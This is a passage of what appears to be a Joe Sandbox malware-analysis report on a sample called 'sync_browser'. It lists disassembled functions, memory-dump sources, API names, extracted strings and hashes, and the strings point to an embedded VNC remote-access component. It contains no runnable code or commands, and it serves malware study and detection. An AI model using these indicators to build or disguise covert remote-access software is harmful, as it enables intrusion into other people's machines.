                                                                      • Opcode Fuzzy Hash: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
                                                                      • Instruction Fuzzy Hash: DF113022A18B4986DB50EF65E4607A9B3A4FB48F88F906432DA4E87618EF3CD455C712
                                                                      Function 00007FF7E5089570 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Escape$Release
                                                                      • String ID:
                                                                      • API String ID: 2350829361-0
                                                                      • Opcode ID: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
                                                                      • Instruction ID: ff9299e86c1450cdc357fbe0520071937e35a619326cc0e4209eee4774d39fc3
                                                                      • Opcode Fuzzy Hash: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
                                                                      • Instruction Fuzzy Hash: 25F06D3261864583E730AB20B965A2EB2A1FB88B84F945136DE4A42E18DF3CD0128B04
                                                                      Function 00007FF7E5135878 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _amsg_exit_getptd$_lock
                                                                      • String ID:
                                                                      • API String ID: 3670291111-0
                                                                      • Opcode ID: a8d2708ae87b95b4ee220a0a01a88b12f7926cd03621c5a20977671bdb7db4c5
                                                                      • Instruction ID: 0f9b5fd21a06346e36d24da62b82ea7a1ab25a71d0badf402ca1005d116072c7
                                                                      • Opcode Fuzzy Hash: a8d2708ae87b95b4ee220a0a01a88b12f7926cd03621c5a20977671bdb7db4c5
                                                                      • Instruction Fuzzy Hash: 57F0FF51E1A14EC1FA547B65A4717B89760EF54F40FCB027ADA0C873DADE3CA940D722
                                                                      Function 00007FF7E507AED0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: htonl
                                                                      • String ID: .$.
                                                                      • API String ID: 2009864989-3769392785
                                                                      • Opcode ID: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
                                                                      • Instruction ID: 32be21b150813946d0b5fc922f6a245df51cc3163026bc265335cb7d4d28078c
                                                                      • Opcode Fuzzy Hash: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
                                                                      • Instruction Fuzzy Hash: 5841C35290C68E44F7157A75A87137DABD46F41F54F985033FA6EC21CADD3CD4458223
                                                                      Function 00007FF7E509C090 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89memoryfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocDeleteFileGlobal_errno_invalid_parameter_noinfo
                                                                      • String ID: !UVNCDIR-
                                                                      • API String ID: 2642416944-2720985186
                                                                      • Opcode ID: 06c9f7cff8713e7e821de9c1934e86ea9f9c841a539949df6008114534a2a042
                                                                      • Instruction ID: 7ab5502feeaa4c49bf3198de8a221e818ecee69a5ca84504d884fb9b082bf3f1
                                                                      • Opcode Fuzzy Hash: 06c9f7cff8713e7e821de9c1934e86ea9f9c841a539949df6008114534a2a042
                                                                      • Instruction Fuzzy Hash: B441962561C7C981EB25AB24B4243FAA751FB86B80F885133DB9D876CADF3CD505C721
                                                                      Function 00007FF7E5129748 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno_invalid_parameter_noinfo
                                                                      • String ID: B
                                                                      • API String ID: 2959964966-1255198513
                                                                      • Opcode ID: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                                      • Instruction ID: 44b67937f89b6ac4100d6c6f450662e3acf37ae9df5af6b3356ea9f259c688cd
                                                                      • Opcode Fuzzy Hash: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                                      • Instruction Fuzzy Hash: 32318236A14659C8E711AF69B4506ACB7B4BB08BA8F980537EE1D93A8CCF38D441D721
                                                                      Function 00007FF7E5134AFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno_invalid_parameter_noinfo
                                                                      • String ID: SecureVNC;0;0x%08x;%s
                                                                      • API String ID: 2959964966-2465057312
                                                                      • Opcode ID: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                                      • Instruction ID: 30ee1f384ff6272b00ea2c56571f92cdd84f942b728b0f8982f0d88587519b66
                                                                      • Opcode Fuzzy Hash: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                                      • Instruction Fuzzy Hash: 2B21E532B1471585E711EF61B4A46ACB6A4BB08BA8F960137EE5C93B8CCE79D401C351
                                                                      Function 00007FF7E5082FE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryFileModuleName
                                                                      • String ID: " -service
                                                                      • API String ID: 3981628254-877726483
                                                                      • Opcode ID: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
                                                                      • Instruction ID: c171fa9a6c41e7981d2d472e2f4096ec598c175610e3d7adee4a95781747fb48
                                                                      • Opcode Fuzzy Hash: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
                                                                      • Instruction Fuzzy Hash: F231A2116087C584E731A724B8253BAB7A1FF89B50F844233D6AC876D9DE3CD114CB21
                                                                      Function 00007FF7E5083EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileModuleNamePlaySound
                                                                      • String ID: ding_dong.wav
                                                                      • API String ID: 3032721342-215479118
                                                                      • Opcode ID: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
                                                                      • Instruction ID: 1d51ecafa9093cd4e44e3e194796428cfede6af165ca82165b5f3692750f2f28
                                                                      • Opcode Fuzzy Hash: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
                                                                      • Instruction Fuzzy Hash: C411332571864991E724AB35F86136AA3A0FF48B60F905337EA6DC76D8DF3CD111CB11
                                                                      Function 00007FF7E50841E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Item$MessageSend_errno_invalid_parameter_noinfo
                                                                      • String ID: <
                                                                      • API String ID: 2439412506-4251816714
                                                                      • Opcode ID: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                                      • Instruction ID: d7231441ead587427f14a6fedae5e0a55f4165667a1c4e693f6e6809eb020a36
                                                                      • Opcode Fuzzy Hash: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                                      • Instruction Fuzzy Hash: 8011913261864586EB60DF12F4207AAB360FBC8B58F945032EB8D47B59CF3CD906CB50
                                                                      Function 00007FF7E5128B14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno_invalid_parameter_noinfo
                                                                      • String ID: I
                                                                      • API String ID: 2959964966-3707901625
                                                                      • Opcode ID: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                                      • Instruction ID: be986c4828670123726109108db2bdfa3b877074eb223cc5ccb988f37f9452ea
                                                                      • Opcode Fuzzy Hash: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                                      • Instruction Fuzzy Hash: D911A072A08784C5EB10AB52B560369F7A4FB94FE0F584236EB9C87B99CF3CD5018B01
                                                                      Function 00007FF7E508FF00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: getpeernameinet_ntoa
                                                                      • String ID: <unavailable>
                                                                      • API String ID: 1982201544-1096956887
                                                                      • Opcode ID: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
                                                                      • Instruction ID: a90c45a56e81e5088a33f48af6c9fceddb66256e22d5ce3188940cdf2e2712c1
                                                                      • Opcode Fuzzy Hash: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
                                                                      • Instruction Fuzzy Hash: 3F01806261564982EF50AB24F46537AB3A0FB88F98F840432EA4E8B369DF3CD445CB11
                                                                      Function 00007FF7E507DA70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$MappingOpenView
                                                                      • String ID: {34F673E0-878F-11D5-B98A-57B0D07B8C7C}
                                                                      • API String ID: 3439327939-2897898322
                                                                      • Opcode ID: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                                      • Instruction ID: 45d873d660a1797f3bbac1211ec355855e3de034b2825a0c4702defe01bf2d63
                                                                      • Opcode Fuzzy Hash: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                                      • Instruction Fuzzy Hash: 5A018E73508B9486E720DBA4F41176AB3A0FB88BA0F890336DA9A43B98DF7CD050C710
                                                                      Function 00007FF7E507D9D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$MappingOpenView
